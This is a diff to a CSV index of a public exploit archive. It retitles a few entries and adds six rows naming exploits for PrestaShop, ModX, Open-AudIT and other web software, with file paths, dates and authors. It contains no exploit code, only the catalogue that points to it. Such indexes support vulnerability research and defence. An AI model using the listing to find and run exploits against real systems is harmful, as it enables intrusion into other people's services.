@@ -20251,7 +20253,7 @@ id,file,description,date,author,type,platform,port
 6417,exploits/php/webapps/6417.txt,"AvailScript Jobs Portal Script - 'jid' SQL Injection",2008-09-10,InjEctOr5,webapps,php,
 6419,exploits/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,webapps,php,
 6420,exploits/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,webapps,asp,
-6421,exploits/php/webapps/6421.php,"WordPress 2.6.1 - SQL Column Truncation Admin Takeover",2008-09-10,iso^kpsbr,webapps,php,
+6421,exploits/php/webapps/6421.php,"WordPress 2.6.1 - Admin Takeover (SQL Column Truncation)",2008-09-10,iso^kpsbr,webapps,php,
 6422,exploits/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,webapps,php,
 6423,exploits/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,webapps,php,
 6425,exploits/php/webapps/6425.txt,"PHPWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",webapps,php,
@@ -28333,7 +28335,7 @@ id,file,description,date,author,type,platform,port
 25437,exploits/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php?cats_app' SQL Injection",2005-04-18,"GulfTech Security",webapps,php,
 25438,exploits/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",webapps,php,
 25440,exploits/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,webapps,php,
-25441,exploits/php/webapps/25441.txt,"Invision Power Board 1.x?/2.x/3.x - Admin Account Takeover",2013-05-14,"John JEAN",webapps,php,
+25441,exploits/php/webapps/25441.txt,"Invision Power Board 1.x?/2.x/3.x - Admin Takeover",2013-05-14,"John JEAN",webapps,php,
 25442,exploits/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php?id' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",webapps,php,
 25447,exploits/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,webapps,php,
 25449,exploits/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",webapps,php,
@@ -37997,7 +37999,7 @@ id,file,description,date,author,type,platform,port
 41150,exploits/php/webapps/41150.md,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",webapps,php,80
 41155,exploits/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",webapps,php,
 41156,exploits/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",webapps,php,
-41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",webapps,php,
+41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin Takeover",2017-01-20,"Charles Fol",webapps,php,
 41159,exploits/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,webapps,php,
 41166,exploits/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php,
 41167,exploits/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php,
@@ -39675,3 +39677,9 @@ id,file,description,date,author,type,platform,port
 45036,exploits/hardware/webapps/45036.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download",2018-07-17,LiquidWorm,webapps,hardware,
 45037,exploits/hardware/webapps/45037.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation",2018-07-17,LiquidWorm,webapps,hardware,
 45038,exploits/hardware/webapps/45038.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root",2018-07-17,LiquidWorm,webapps,hardware,
+45046,exploits/php/webapps/45046.py,"PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,
+45047,exploits/php/webapps/45047.txt,"PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation",2018-07-16,"Charles Fol",webapps,php,
+45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80
+45053,exploits/multiple/webapps/45053.txt,"Open-AudIT Community 2.1.1 - Cross-Site Scripting",2018-07-18,"Ranjeet Jaiswal",webapps,multiple,
+45054,exploits/php/webapps/45054.txt,"FTP2FTP 1.0 - Arbitrary File Download",2018-07-18,AkkuS,webapps,php,
+45055,exploits/php/webapps/45055.py,"Modx Revolution < 2.6.4 - Remote Code Execution",2018-07-18,"Vitalii Rudnykh",webapps,php,